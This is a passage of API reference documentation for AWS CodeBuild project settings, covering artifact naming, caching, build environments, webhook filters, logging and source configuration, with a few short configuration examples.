For example, if ``path`` is set to ``MyArtifacts`` , ``namespaceType`` is set to ``BUILD_ID`` , and ``name`` is set to ``MyArtifact.zip`` , the output artifact is stored in ``MyArtifacts/*build-ID* /MyArtifact.zip`` .
- **name** *(string) --*
Along with ``path`` and ``namespaceType`` , the pattern that AWS CodeBuild uses to name and store the output artifact:
* If ``type`` is set to ``CODEPIPELINE`` , AWS CodePipeline ignores this value if specified. This is because AWS CodePipeline manages its build output names instead of AWS CodeBuild.
* If ``type`` is set to ``NO_ARTIFACTS`` , this value is ignored if specified, because no build output is produced.
* If ``type`` is set to ``S3`` , this is the name of the output artifact object. If you set the name to be a forward slash ("/"), the artifact is stored in the root of the output bucket.
For example:
* If ``path`` is set to ``MyArtifacts`` , ``namespaceType`` is set to ``BUILD_ID`` , and ``name`` is set to ``MyArtifact.zip`` , then the output artifact is stored in ``MyArtifacts/*build-ID* /MyArtifact.zip`` .
* If ``path`` is empty, ``namespaceType`` is set to ``NONE`` , and ``name`` is set to "``/`` ", the output artifact is stored in the root of the output bucket.
* If ``path`` is set to ``MyArtifacts`` , ``namespaceType`` is set to ``BUILD_ID`` , and ``name`` is set to "``/`` ", the output artifact is stored in ``MyArtifacts/*build-ID* `` .
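The naming rules above can be summarized in a small helper; this sketch merely reproduces the documented behavior and is not an AWS API ::
def artifact_key(path, namespace_type, name, build_id):
    # path, then optionally the build ID, then the artifact name, joined with '/'.
    parts = []
    if path:
        parts.append(path.strip('/'))
    if namespace_type == 'BUILD_ID':
        parts.append(build_id)
    if name and name != '/':
        parts.append(name)
    return '/'.join(parts)
artifact_key('MyArtifacts', 'BUILD_ID', 'MyArtifact.zip', 'build-ID')
# -> 'MyArtifacts/build-ID/MyArtifact.zip'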
- **packaging** *(string) --*
The type of build output artifact to create:
* If ``type`` is set to ``CODEPIPELINE`` , AWS CodePipeline ignores this value if specified. This is because AWS CodePipeline manages its build output artifacts instead of AWS CodeBuild.
* If ``type`` is set to ``NO_ARTIFACTS`` , this value is ignored if specified, because no build output is produced.
* If ``type`` is set to ``S3`` , valid values include:
* ``NONE`` : AWS CodeBuild creates a folder in the output bucket that contains the build output. This is the default if ``packaging`` is not specified.
* ``ZIP`` : AWS CodeBuild creates a ZIP file in the output bucket that contains the build output.
- **overrideArtifactName** *(boolean) --*
If this flag is set, a name specified in the build spec file overrides the artifact name. The name specified in a build spec file is calculated at build time and uses the Shell Command Language. For example, you can append a date and time to your artifact name so that it is always unique.
- **encryptionDisabled** *(boolean) --*
Set to true if you do not want your output artifacts encrypted. This option is valid only if your artifacts type is Amazon Simple Storage Service (Amazon S3). If this is set with another artifacts type, an invalidInputException is thrown.
- **artifactIdentifier** *(string) --*
An identifier for this artifact definition.
- **secondaryArtifacts** *(list) --*
An array of ``ProjectArtifacts`` objects.
- *(dict) --*
Information about the build output artifacts for the build project.
- **type** *(string) --*
The type of build output artifact. Valid values include:
* ``CODEPIPELINE`` : The build project has build output generated through AWS CodePipeline.
* ``NO_ARTIFACTS`` : The build project does not produce any build output.
* ``S3`` : The build project stores build output in Amazon Simple Storage Service (Amazon S3).
- **location** *(string) --*
Information about the build output artifact location:
* If ``type`` is set to ``CODEPIPELINE`` , AWS CodePipeline ignores this value if specified. This is because AWS CodePipeline manages its build output locations instead of AWS CodeBuild.
* If ``type`` is set to ``NO_ARTIFACTS`` , this value is ignored if specified, because no build output is produced.
* If ``type`` is set to ``S3`` , this is the name of the output bucket.
- **path** *(string) --*
Along with ``namespaceType`` and ``name`` , the pattern that AWS CodeBuild uses to name and store the output artifact:
* If ``type`` is set to ``CODEPIPELINE`` , AWS CodePipeline ignores this value if specified. This is because AWS CodePipeline manages its build output names instead of AWS CodeBuild.
* If ``type`` is set to ``NO_ARTIFACTS`` , this value is ignored if specified, because no build output is produced.
* If ``type`` is set to ``S3`` , this is the path to the output artifact. If ``path`` is not specified, ``path`` is not used.
For example, if ``path`` is set to ``MyArtifacts`` , ``namespaceType`` is set to ``NONE`` , and ``name`` is set to ``MyArtifact.zip`` , the output artifact is stored in the output bucket at ``MyArtifacts/MyArtifact.zip`` .
- **namespaceType** *(string) --*
Along with ``path`` and ``name`` , the pattern that AWS CodeBuild uses to determine the name and location to store the output artifact:
* If ``type`` is set to ``CODEPIPELINE`` , AWS CodePipeline ignores this value if specified. This is because AWS CodePipeline manages its build output names instead of AWS CodeBuild.
* If ``type`` is set to ``NO_ARTIFACTS`` , this value is ignored if specified, because no build output is produced.
* If ``type`` is set to ``S3`` , valid values include:
* ``BUILD_ID`` : Include the build ID in the location of the build output artifact.
* ``NONE`` : Do not include the build ID. This is the default if ``namespaceType`` is not specified.
For example, if ``path`` is set to ``MyArtifacts`` , ``namespaceType`` is set to ``BUILD_ID`` , and ``name`` is set to ``MyArtifact.zip`` , the output artifact is stored in ``MyArtifacts/*build-ID* /MyArtifact.zip`` .
- **name** *(string) --*
Along with ``path`` and ``namespaceType`` , the pattern that AWS CodeBuild uses to name and store the output artifact:
* If ``type`` is set to ``CODEPIPELINE`` , AWS CodePipeline ignores this value if specified. This is because AWS CodePipeline manages its build output names instead of AWS CodeBuild.
* If ``type`` is set to ``NO_ARTIFACTS`` , this value is ignored if specified, because no build output is produced.
* If ``type`` is set to ``S3`` , this is the name of the output artifact object. If you set the name to be a forward slash ("/"), the artifact is stored in the root of the output bucket.
For example:
* If ``path`` is set to ``MyArtifacts`` , ``namespaceType`` is set to ``BUILD_ID`` , and ``name`` is set to ``MyArtifact.zip`` , then the output artifact is stored in ``MyArtifacts/*build-ID* /MyArtifact.zip`` .
* If ``path`` is empty, ``namespaceType`` is set to ``NONE`` , and ``name`` is set to "``/`` ", the output artifact is stored in the root of the output bucket.
* If ``path`` is set to ``MyArtifacts`` , ``namespaceType`` is set to ``BUILD_ID`` , and ``name`` is set to "``/`` ", the output artifact is stored in ``MyArtifacts/*build-ID* `` .
- **packaging** *(string) --*
The type of build output artifact to create:
* If ``type`` is set to ``CODEPIPELINE`` , AWS CodePipeline ignores this value if specified. This is because AWS CodePipeline manages its build output artifacts instead of AWS CodeBuild.
* If ``type`` is set to ``NO_ARTIFACTS`` , this value is ignored if specified, because no build output is produced.
* If ``type`` is set to ``S3`` , valid values include:
* ``NONE`` : AWS CodeBuild creates a folder in the output bucket that contains the build output. This is the default if ``packaging`` is not specified.
* ``ZIP`` : AWS CodeBuild creates a ZIP file in the output bucket that contains the build output.
- **overrideArtifactName** *(boolean) --*
If this flag is set, a name specified in the build spec file overrides the artifact name. The name specified in a build spec file is calculated at build time and uses the Shell Command Language. For example, you can append a date and time to your artifact name so that it is always unique.
- **encryptionDisabled** *(boolean) --*
Set to true if you do not want your output artifacts encrypted. This option is valid only if your artifacts type is Amazon Simple Storage Service (Amazon S3). If this is set with another artifacts type, an invalidInputException is thrown.
- **artifactIdentifier** *(string) --*
An identifier for this artifact definition.
- **cache** *(dict) --*
Information about the cache for the build project.
- **type** *(string) --*
The type of cache used by the build project. Valid values include:
* ``NO_CACHE`` : The build project does not use any cache.
* ``S3`` : The build project reads and writes from and to S3.
* ``LOCAL`` : The build project stores a cache locally on a build host that is only available to that build host.
- **location** *(string) --*
Information about the cache location:
* ``NO_CACHE`` or ``LOCAL`` : This value is ignored.
* ``S3`` : This is the S3 bucket name/prefix.
- **modes** *(list) --*
If you use a ``LOCAL`` cache, the local cache mode. You can use one or more local cache modes at the same time.
* ``LOCAL_SOURCE_CACHE`` mode caches Git metadata for primary and secondary sources. After the cache is created, subsequent builds pull only the change between commits. This mode is a good choice for projects with a clean working directory and a source that is a large Git repository. If you choose this option and your project does not use a Git repository (GitHub, GitHub Enterprise, or Bitbucket), the option is ignored.
* ``LOCAL_DOCKER_LAYER_CACHE`` mode caches existing Docker layers. This mode is a good choice for projects that build or pull large Docker images. It can prevent the performance issues caused by pulling large Docker images down from the network.
.. note::
* You can use a Docker layer cache in the Linux environment only.
* The ``privileged`` flag must be set so that your project has the required Docker permissions.
* You should consider the security implications before you use a Docker layer cache.
* ``LOCAL_CUSTOM_CACHE`` mode caches directories you specify in the buildspec file. This mode is a good choice if your build scenario is not suited to one of the other two local cache modes. If you use a custom cache:
* Only directories can be specified for caching. You cannot specify individual files.
* Symlinks are used to reference cached directories.
* Cached directories are linked to your build before it downloads its project sources. Cached items are overridden if a source item has the same name. Directories are specified using cache paths in the buildspec file.
- *(string) --*
- **environment** *(dict) --*
Information about the build environment for this build project.
- **type** *(string) --*
The type of build environment to use for related builds.
- **image** *(string) --*
The image tag or image digest that identifies the Docker image to use for this build project. Use the following formats:
* For an image tag: ``registry/repository:tag`` . For example, to specify an image with the tag "latest," use ``registry/repository:latest`` .
* For an image digest: ``registry/repository@digest`` . For example, to specify an image with the digest "sha256:cbbf2f9a99b47fc460d422812b6a5adff7dfee951d8fa2e4a98caa0382cfbdbf," use ``registry/repository@sha256:cbbf2f9a99b47fc460d422812b6a5adff7dfee951d8fa2e4a98caa0382cfbdbf`` .
- **computeType** *(string) --*
Information about the compute resources the build project uses. Available values include:
* ``BUILD_GENERAL1_SMALL`` : Use up to 3 GB memory and 2 vCPUs for builds.
* ``BUILD_GENERAL1_MEDIUM`` : Use up to 7 GB memory and 4 vCPUs for builds.
* ``BUILD_GENERAL1_LARGE`` : Use up to 15 GB memory and 8 vCPUs for builds.
- **environmentVariables** *(list) --*
A set of environment variables to make available to builds for this build project.
- *(dict) --*
Information about an environment variable for a build project or a build.
- **name** *(string) --*
The name or key of the environment variable.
- **value** *(string) --*
The value of the environment variable.
.. warning::
We strongly discourage the use of environment variables to store sensitive values, especially AWS secret key IDs and secret access keys. Environment variables can be displayed in plain text using the AWS CodeBuild console and the AWS Command Line Interface (AWS CLI).
- **type** *(string) --*
The type of environment variable. Valid values include:
* ``PARAMETER_STORE`` : An environment variable stored in Amazon EC2 Systems Manager Parameter Store.
* ``PLAINTEXT`` : An environment variable in plaintext format.
- **privilegedMode** *(boolean) --*
Enables running the Docker daemon inside a Docker container. Set to true only if the build project is used to build Docker images, and the specified build environment image is not provided by AWS CodeBuild with Docker support. Otherwise, all associated builds that attempt to interact with the Docker daemon fail. You must also start the Docker daemon so that builds can interact with it. One way to do this is to initialize the Docker daemon during the install phase of your build spec by running the following build commands. (Do not run these commands if the specified build environment image is provided by AWS CodeBuild with Docker support.)
If the operating system's base image is Ubuntu Linux:
``- nohup /usr/local/bin/dockerd --host=unix:///var/run/docker.sock --host=tcp://0.0.0.0:2375 --storage-driver=overlay& - timeout 15 sh -c "until docker info; do echo .; sleep 1; done"``
If the operating system's base image is Alpine Linux, add the ``-t`` argument to ``timeout`` :
``- nohup /usr/local/bin/dockerd --host=unix:///var/run/docker.sock --host=tcp://0.0.0.0:2375 --storage-driver=overlay& - timeout -t 15 sh -c "until docker info; do echo .; sleep 1; done"``
- **certificate** *(string) --*
The certificate to use with this build project.
- **registryCredential** *(dict) --*
The credentials for access to a private registry.
- **credential** *(string) --*
The Amazon Resource Name (ARN) or name of credentials created using AWS Secrets Manager.
.. note::
The ``credential`` can use the name of the credentials only if they exist in your current region.
- **credentialProvider** *(string) --*
The service that created the credentials to access a private Docker registry. The valid value, SECRETS_MANAGER, is for AWS Secrets Manager.
- **imagePullCredentialsType** *(string) --*
The type of credentials AWS CodeBuild uses to pull images in your build. There are two valid values:
* ``CODEBUILD`` specifies that AWS CodeBuild uses its own credentials. This requires that you modify your ECR repository policy to trust AWS CodeBuild's service principal.
* ``SERVICE_ROLE`` specifies that AWS CodeBuild uses your build project's service role.
When you use a cross-account or private registry image, you must use SERVICE_ROLE credentials. When you use an AWS CodeBuild curated image, you must use CODEBUILD credentials.
- **serviceRole** *(string) --*
The ARN of the AWS Identity and Access Management (IAM) role that enables AWS CodeBuild to interact with dependent AWS services on behalf of the AWS account.
- **timeoutInMinutes** *(integer) --*
How long, in minutes, from 5 to 480 (8 hours), that AWS CodeBuild waits before timing out any related build that does not get marked as completed. The default is 60 minutes.
- **queuedTimeoutInMinutes** *(integer) --*
The number of minutes a build is allowed to be queued before it times out.
- **encryptionKey** *(string) --*
The AWS Key Management Service (AWS KMS) customer master key (CMK) to be used for encrypting the build output artifacts.
.. note::
You can use a cross-account KMS key to encrypt the build output artifacts if your service role has permission to that key.
You can specify either the Amazon Resource Name (ARN) of the CMK or, if available, the CMK's alias (using the format ``alias/*alias-name* `` ).
- **tags** *(list) --*
The tags for this build project.
These tags are available for use by AWS services that support AWS CodeBuild build project tags.
- *(dict) --*
A tag, consisting of a key and a value.
This tag is available for use by AWS services that support tags in AWS CodeBuild.
- **key** *(string) --*
The tag's key.
- **value** *(string) --*
The tag's value.
- **created** *(datetime) --*
When the build project was created, expressed in Unix time format.
- **lastModified** *(datetime) --*
When the build project's settings were last modified, expressed in Unix time format.
- **webhook** *(dict) --*
Information about a webhook that connects repository events to a build project in AWS CodeBuild.
- **url** *(string) --*
The URL to the webhook.
- **payloadUrl** *(string) --*
The AWS CodeBuild endpoint where webhook events are sent.
- **secret** *(string) --*
The secret token of the associated repository.
.. note::
A Bitbucket webhook does not support ``secret`` .
- **branchFilter** *(string) --*
A regular expression used to determine which repository branches are built when a webhook is triggered. If the name of a branch matches the regular expression, then it is built. If ``branchFilter`` is empty, then all branches are built.
.. note::
It is recommended that you use ``filterGroups`` instead of ``branchFilter`` .
- **filterGroups** *(list) --*
An array of arrays of ``WebhookFilter`` objects used to determine which webhooks are triggered. At least one ``WebhookFilter`` in the array must specify ``EVENT`` as its ``type`` .
For a build to be triggered, at least one filter group in the ``filterGroups`` array must pass. For a filter group to pass, each of its filters must pass (a construction sketch follows this webhook structure).
- *(list) --*
- *(dict) --*
A filter used to determine which webhooks trigger a build.
- **type** *(string) --*
The type of webhook filter. There are five webhook filter types: ``EVENT`` , ``ACTOR_ACCOUNT_ID`` , ``HEAD_REF`` , ``BASE_REF`` , and ``FILE_PATH`` .
EVENT
A webhook event triggers a build when the provided ``pattern`` matches one of four event types: ``PUSH`` , ``PULL_REQUEST_CREATED`` , ``PULL_REQUEST_UPDATED`` , and ``PULL_REQUEST_REOPENED`` . The ``EVENT`` patterns are specified as a comma-separated string. For example, ``PUSH, PULL_REQUEST_CREATED, PULL_REQUEST_UPDATED`` filters all push, pull request created, and pull request updated events.
.. note::
The ``PULL_REQUEST_REOPENED`` event type works with GitHub and GitHub Enterprise only.
ACTOR_ACCOUNT_ID
A webhook event triggers a build when a GitHub, GitHub Enterprise, or Bitbucket account ID matches the regular expression ``pattern`` .
HEAD_REF
A webhook event triggers a build when the head reference matches the regular expression ``pattern`` . For example, ``refs/heads/branch-name`` and ``refs/tags/tag-name`` .
Works with GitHub and GitHub Enterprise push, GitHub and GitHub Enterprise pull request, Bitbucket push, and Bitbucket pull request events.
BASE_REF
A webhook event triggers a build when the base reference matches the regular expression ``pattern`` . For example, ``refs/heads/branch-name`` .
.. note::
Works with pull request events only.
FILE_PATH
A webhook triggers a build when the path of a changed file matches the regular expression ``pattern`` .
.. note::
Works with GitHub and GitHub Enterprise push events only.
- **pattern** *(string) --*
For a ``WebHookFilter`` that uses ``EVENT`` type, a comma-separated string that specifies one or more events. For example, the webhook filter ``PUSH, PULL_REQUEST_CREATED, PULL_REQUEST_UPDATED`` allows all push, pull request created, and pull request updated events to trigger a build.
For a ``WebHookFilter`` that uses any of the other filter types, a regular expression pattern. For example, a ``WebHookFilter`` that uses ``HEAD_REF`` for its ``type`` and the pattern ``^refs/heads/`` triggers a build when the head reference is a branch with a reference name ``refs/heads/branch-name`` .
- **excludeMatchedPattern** *(boolean) --*
Used to indicate that the ``pattern`` determines which webhook events do not trigger a build. If true, then a webhook event that does not match the ``pattern`` triggers a build. If false, then a webhook event that matches the ``pattern`` triggers a build.
- **lastModifiedSecret** *(datetime) --*
A timestamp that indicates the last time a repository's secret token was modified.
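For illustration, the OR-across-groups and AND-within-group semantics noted earlier can be expressed as follows when updating a webhook; the project name and branch are hypothetical ::
filter_groups = [
    # Group 1: pull requests that target main (every filter in the group must match).
    [
        {'type': 'EVENT', 'pattern': 'PULL_REQUEST_CREATED, PULL_REQUEST_UPDATED'},
        {'type': 'BASE_REF', 'pattern': '^refs/heads/main$'},
    ],
    # Group 2: any push (a build triggers if any one group matches).
    [
        {'type': 'EVENT', 'pattern': 'PUSH'},
    ],
]
client.update_webhook(projectName='my-project', filterGroups=filter_groups)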
- **vpcConfig** *(dict) --*
Information about the VPC configuration that AWS CodeBuild accesses.
- **vpcId** *(string) --*
The ID of the Amazon VPC.
- **subnets** *(list) --*
A list of one or more subnet IDs in your Amazon VPC.
- *(string) --*
- **securityGroupIds** *(list) --*
A list of one or more security group IDs in your Amazon VPC.
- *(string) --*
- **badge** *(dict) --*
Information about the build badge for the build project.
- **badgeEnabled** *(boolean) --*
Set this to true to generate a publicly accessible URL for your project's build badge.
- **badgeRequestUrl** *(string) --*
The publicly accessible URL through which you can access the build badge for your project.
- **logsConfig** *(dict) --*
Information about logs for the build project. A project can create logs in Amazon CloudWatch Logs, an S3 bucket, or both.
- **cloudWatchLogs** *(dict) --*
Information about Amazon CloudWatch Logs for a build project. Amazon CloudWatch Logs are enabled by default.
- **status** *(string) --*
The current status of the logs in Amazon CloudWatch Logs for a build project. Valid values are:
* ``ENABLED`` : Amazon CloudWatch Logs are enabled for this build project.
* ``DISABLED`` : Amazon CloudWatch Logs are not enabled for this build project.
- **groupName** *(string) --*
The group name of the logs in Amazon CloudWatch Logs. For more information, see `Working with Log Groups and Log Streams <https://docs.aws.amazon.com/AmazonCloudWatch/latest/logs/Working-with-log-groups-and-streams.html>`__ .
- **streamName** *(string) --*
The prefix of the stream name of the Amazon CloudWatch Logs. For more information, see `Working with Log Groups and Log Streams <https://docs.aws.amazon.com/AmazonCloudWatch/latest/logs/Working-with-log-groups-and-streams.html>`__ .
- **s3Logs** *(dict) --*
Information about logs built to an S3 bucket for a build project. S3 logs are not enabled by default.
- **status** *(string) --*
The current status of the S3 build logs. Valid values are:
* ``ENABLED`` : S3 build logs are enabled for this build project.
* ``DISABLED`` : S3 build logs are not enabled for this build project.
- **location** *(string) --*
The ARN of an S3 bucket and the path prefix for S3 logs. If your Amazon S3 bucket name is ``my-bucket`` , and your path prefix is ``build-log`` , then acceptable formats are ``my-bucket/build-log`` or ``arn:aws:s3:::my-bucket/build-log`` .
- **encryptionDisabled** *(boolean) --*
Set to true if you do not want your S3 build log output encrypted. By default S3 build logs are encrypted.
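As a sketch, enabling both CloudWatch Logs and S3 logs on a project; the group, stream, and bucket names are illustrative ::
logs_config = {
    'cloudWatchLogs': {
        'status': 'ENABLED',
        'groupName': 'my-build-logs',
        'streamName': 'my-project'
    },
    's3Logs': {
        'status': 'ENABLED',
        'location': 'my-bucket/build-log',  # bucket name plus path prefix
        'encryptionDisabled': False
    }
}
client.update_project(name='my-project', logsConfig=logs_config)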
:type name: string
:param name: **[REQUIRED]**
The name of the build project.
.. note::
You cannot change a build project\'s name.
:type description: string
:param description:
A new or replacement description of the build project.
:type source: dict
:param source:
Information to be changed about the build input source code for the build project.
- **type** *(string) --* **[REQUIRED]**
The type of repository that contains the source code to be built. Valid values include:
* ``BITBUCKET`` : The source code is in a Bitbucket repository.
* ``CODECOMMIT`` : The source code is in an AWS CodeCommit repository.
* ``CODEPIPELINE`` : The source code settings are specified in the source action of a pipeline in AWS CodePipeline.
* ``GITHUB`` : The source code is in a GitHub repository.
* ``NO_SOURCE`` : The project does not have input source code.
* ``S3`` : The source code is in an Amazon Simple Storage Service (Amazon S3) input bucket.
- **location** *(string) --*
Information about the location of the source code to be built. Valid values include:
* For source code settings that are specified in the source action of a pipeline in AWS CodePipeline, ``location`` should not be specified. If it is specified, AWS CodePipeline ignores it. This is because AWS CodePipeline uses the settings in a pipeline\'s source action instead of this value.
* For source code in an AWS CodeCommit repository, the HTTPS clone URL to the repository that contains the source code and the build spec (for example, ``https://git-codecommit.*region-ID* .amazonaws.com/v1/repos/*repo-name* `` ).
* For source code in an Amazon Simple Storage Service (Amazon S3) input bucket, one of the following.
* The path to the ZIP file that contains the source code (for example, `` *bucket-name* /*path* /*to* /*object-name* .zip`` ).
* The path to the folder that contains the source code (for example, `` *bucket-name* /*path* /*to* /*source-code* /*folder* /`` ).
* For source code in a GitHub repository, the HTTPS clone URL to the repository that contains the source and the build spec. You must connect your AWS account to your GitHub account. Use the AWS CodeBuild console to start creating a build project. When you use the console to connect (or reconnect) with GitHub, on the GitHub **Authorize application** page, for **Organization access** , choose **Request access** next to each repository you want to allow AWS CodeBuild to have access to, and then choose **Authorize application** . (After you have connected to your GitHub account, you do not need to finish creating the build project. You can leave the AWS CodeBuild console.) To instruct AWS CodeBuild to use this connection, in the ``source`` object, set the ``auth`` object\'s ``type`` value to ``OAUTH`` .
* For source code in a Bitbucket repository, the HTTPS clone URL to the repository that contains the source and the build spec. You must connect your AWS account to your Bitbucket account. Use the AWS CodeBuild console to start creating a build project. When you use the console to connect (or reconnect) with Bitbucket, on the Bitbucket **Confirm access to your account** page, choose **Grant access** . (After you have connected to your Bitbucket account, you do not need to finish creating the build project. You can leave the AWS CodeBuild console.) To instruct AWS CodeBuild to use this connection, in the ``source`` object, set the ``auth`` object\'s ``type`` value to ``OAUTH`` .
- **gitCloneDepth** *(integer) --*
Information about the Git clone depth for the build project.
- **gitSubmodulesConfig** *(dict) --*
Information about the Git submodules configuration for the build project.
- **fetchSubmodules** *(boolean) --* **[REQUIRED]**
Set to true to fetch Git submodules for your AWS CodeBuild build project.
- **buildspec** *(string) --*
The build spec declaration to use for the builds in this build project.
If this value is not specified, a build spec must be included along with the source code to be built.
- **auth** *(dict) --*
Information about the authorization settings for AWS CodeBuild to access the source code to be built.
This information is for the AWS CodeBuild console\'s use only. Your code should not get or set this information directly.
- **type** *(string) --* **[REQUIRED]**
.. note::
This data type is deprecated and is no longer accurate or used.
The authorization type to use. The only valid value is ``OAUTH`` , which represents the OAuth authorization type.
- **resource** *(string) --*
The resource value that applies to the specified authorization type.
- **reportBuildStatus** *(boolean) --*
Set to true to report the status of a build\'s start and finish to your source provider. This option is valid only when your source provider is GitHub, GitHub Enterprise, or Bitbucket. If this is set and you use a different source provider, an invalidInputException is thrown.
- **insecureSsl** *(boolean) --*
Enable this flag to ignore SSL warnings while connecting to the project source code.
- **sourceIdentifier** *(string) --*
An identifier for this project source.
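For example, a hedged sketch of a ``source`` value for a GitHub repository (the clone URL is hypothetical)::
{
'type': 'GITHUB',
'location': 'https://github.com/my-org/my-repo.git',
'gitCloneDepth': 1,
'reportBuildStatus': True,
'auth': {'type': 'OAUTH'}
}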
:type secondarySources: list
:param secondarySources:
An array of ``ProjectSource`` objects.
- *(dict) --*
Information about the build input source code for the build project.
- **type** *(string) --* **[REQUIRED]**
The type of repository that contains the source code to be built. Valid values include:
* ``BITBUCKET`` : The source code is in a Bitbucket repository.
* ``CODECOMMIT`` : The source code is in an AWS CodeCommit repository.
* ``CODEPIPELINE`` : The source code settings are specified in the source action of a pipeline in AWS CodePipeline.
* ``GITHUB`` : The source code is in a GitHub repository.
* ``NO_SOURCE`` : The project does not have input source code.
* ``S3`` : The source code is in an Amazon Simple Storage Service (Amazon S3) input bucket.
- **location** *(string) --*
Information about the location of the source code to be built. Valid values include:
* For source code settings that are specified in the source action of a pipeline in AWS CodePipeline, ``location`` should not be specified. If it is specified, AWS CodePipeline ignores it. This is because AWS CodePipeline uses the settings in a pipeline\'s source action instead of this value.
* For source code in an AWS CodeCommit repository, the HTTPS clone URL to the repository that contains the source code and the build spec (for example, ``https://git-codecommit.*region-ID* .amazonaws.com/v1/repos/*repo-name* `` ).
* For source code in an Amazon Simple Storage Service (Amazon S3) input bucket, one of the following.
* The path to the ZIP file that contains the source code (for example, `` *bucket-name* /*path* /*to* /*object-name* .zip`` ).
* The path to the folder that contains the source code (for example, `` *bucket-name* /*path* /*to* /*source-code* /*folder* /`` ).
* For source code in a GitHub repository, the HTTPS clone URL to the repository that contains the source and the build spec. You must connect your AWS account to your GitHub account. Use the AWS CodeBuild console to start creating a build project. When you use the console to connect (or reconnect) with GitHub, on the GitHub **Authorize application** page, for **Organization access** , choose **Request access** next to each repository you want to allow AWS CodeBuild to have access to, and then choose **Authorize application** . (After you have connected to your GitHub account, you do not need to finish creating the build project. You can leave the AWS CodeBuild console.) To instruct AWS CodeBuild to use this connection, in the ``source`` object, set the ``auth`` object\'s ``type`` value to ``OAUTH`` .
* For source code in a Bitbucket repository, the HTTPS clone URL to the repository that contains the source and the build spec. You must connect your AWS account to your Bitbucket account. Use the AWS CodeBuild console to start creating a build project. When you use the console to connect (or reconnect) with Bitbucket, on the Bitbucket **Confirm access to your account** page, choose **Grant access** . (After you have connected to your Bitbucket account, you do not need to finish creating the build project. You can leave the AWS CodeBuild console.) To instruct AWS CodeBuild to use this connection, in the ``source`` object, set the ``auth`` object\'s ``type`` value to ``OAUTH`` .
- **gitCloneDepth** *(integer) --*
Information about the Git clone depth for the build project.
- **gitSubmodulesConfig** *(dict) --*
Information about the Git submodules configuration for the build project.
- **fetchSubmodules** *(boolean) --* **[REQUIRED]**
Set to true to fetch Git submodules for your AWS CodeBuild build project.
- **buildspec** *(string) --*
The build spec declaration to use for the builds in this build project.
If this value is not specified, a build spec must be included along with the source code to be built.
- **auth** *(dict) --*
Information about the authorization settings for AWS CodeBuild to access the source code to be built.
This information is for the AWS CodeBuild console\'s use only. Your code should not get or set this information directly.
- **type** *(string) --* **[REQUIRED]**
.. note::
This data type is deprecated and is no longer accurate or used.
The authorization type to use. The only valid value is ``OAUTH`` , which represents the OAuth authorization type.
- **resource** *(string) --*
The resource value that applies to the specified authorization type.
- **reportBuildStatus** *(boolean) --*
Set to true to report the status of a build\'s start and finish to your source provider. This option is valid only when your source provider is GitHub, GitHub Enterprise, or Bitbucket. If this is set and you use a different source provider, an invalidInputException is thrown.
- **insecureSsl** *(boolean) --*
Enable this flag to ignore SSL warnings while connecting to the project source code.
- **sourceIdentifier** *(string) --*
An identifier for this project source.
:type artifacts: dict
:param artifacts:
Information to be changed about the build output artifacts for the build project.
- **type** *(string) --* **[REQUIRED]**
The type of build output artifact. Valid values include:
* ``CODEPIPELINE`` : The build project has build output generated through AWS CodePipeline.
* ``NO_ARTIFACTS`` : The build project does not produce any build output.
* ``S3`` : The build project stores build output in Amazon Simple Storage Service (Amazon S3).
- **location** *(string) --*
Information about the build output artifact location:
* If ``type`` is set to ``CODEPIPELINE`` , AWS CodePipeline ignores this value if specified. This is because AWS CodePipeline manages its build output locations instead of AWS CodeBuild.
* If ``type`` is set to ``NO_ARTIFACTS`` , this value is ignored if specified, because no build output is produced.
* If ``type`` is set to ``S3`` , this is the name of the output bucket.
- **path** *(string) --*
Along with ``namespaceType`` and ``name`` , the pattern that AWS CodeBuild uses to name and store the output artifact:
* If ``type`` is set to ``CODEPIPELINE`` , AWS CodePipeline ignores this value if specified. This is because AWS CodePipeline manages its build output names instead of AWS CodeBuild.
* If ``type`` is set to ``NO_ARTIFACTS`` , this value is ignored if specified, because no build output is produced.
* If ``type`` is set to ``S3`` , this is the path to the output artifact. If ``path`` is not specified, ``path`` is not used.
For example, if ``path`` is set to ``MyArtifacts`` , ``namespaceType`` is set to ``NONE`` , and ``name`` is set to ``MyArtifact.zip`` , the output artifact is stored in the output bucket at ``MyArtifacts/MyArtifact.zip`` .
- **namespaceType** *(string) --*
Along with ``path`` and ``name`` , the pattern that AWS CodeBuild uses to determine the name and location to store the output artifact:
* If ``type`` is set to ``CODEPIPELINE`` , AWS CodePipeline ignores this value if specified. This is because AWS CodePipeline manages its build output names instead of AWS CodeBuild.
* If ``type`` is set to ``NO_ARTIFACTS`` , this value is ignored if specified, because no build output is produced.
* If ``type`` is set to ``S3`` , valid values include:
* ``BUILD_ID`` : Include the build ID in the location of the build output artifact.
* ``NONE`` : Do not include the build ID. This is the default if ``namespaceType`` is not specified.
For example, if ``path`` is set to ``MyArtifacts`` , ``namespaceType`` is set to ``BUILD_ID`` , and ``name`` is set to ``MyArtifact.zip`` , the output artifact is stored in ``MyArtifacts/*build-ID* /MyArtifact.zip`` .
- **name** *(string) --*
Along with ``path`` and ``namespaceType`` , the pattern that AWS CodeBuild uses to name and store the output artifact:
* If ``type`` is set to ``CODEPIPELINE`` , AWS CodePipeline ignores this value if specified. This is because AWS CodePipeline manages its build output names instead of AWS CodeBuild.
* If ``type`` is set to ``NO_ARTIFACTS`` , this value is ignored if specified, because no build output is produced.
* If ``type`` is set to ``S3`` , this is the name of the output artifact object. If you set the name to be a forward slash (\"/\"), the artifact is stored in the root of the output bucket.
For example:
* If ``path`` is set to ``MyArtifacts`` , ``namespaceType`` is set to ``BUILD_ID`` , and ``name`` is set to ``MyArtifact.zip`` , then the output artifact is stored in ``MyArtifacts/*build-ID* /MyArtifact.zip`` .
* If ``path`` is empty, ``namespaceType`` is set to ``NONE`` , and ``name`` is set to \"``/`` \", the output artifact is stored in the root of the output bucket.
* If ``path`` is set to ``MyArtifacts`` , ``namespaceType`` is set to ``BUILD_ID`` , and ``name`` is set to \"``/`` \", the output artifact is stored in ``MyArtifacts/*build-ID* `` .
- **packaging** *(string) --*
The type of build output artifact to create:
* If ``type`` is set to ``CODEPIPELINE`` , AWS CodePipeline ignores this value if specified. This is because AWS CodePipeline manages its build output artifacts instead of AWS CodeBuild.
* If ``type`` is set to ``NO_ARTIFACTS`` , this value is ignored if specified, because no build output is produced.
* If ``type`` is set to ``S3`` , valid values include:
* ``NONE`` : AWS CodeBuild creates a folder in the output bucket that contains the build output. This is the default if ``packaging`` is not specified.
* ``ZIP`` : AWS CodeBuild creates a ZIP file in the output bucket that contains the build output.
- **overrideArtifactName** *(boolean) --*
